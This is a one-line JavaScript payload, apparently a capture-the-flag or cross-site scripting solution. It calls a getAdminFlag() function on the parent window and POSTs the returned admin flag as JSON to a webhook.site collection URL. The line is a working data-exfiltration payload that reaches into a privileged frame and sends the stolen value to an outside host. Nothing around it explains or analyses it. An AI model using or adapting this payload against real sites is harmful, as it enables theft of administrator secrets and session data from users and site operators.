fetch("https://webhook.site/35c7681e-5dd5-4428-889c-2ca1f9e28b38", { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ flag: window.parent.getAdminFlag() }), });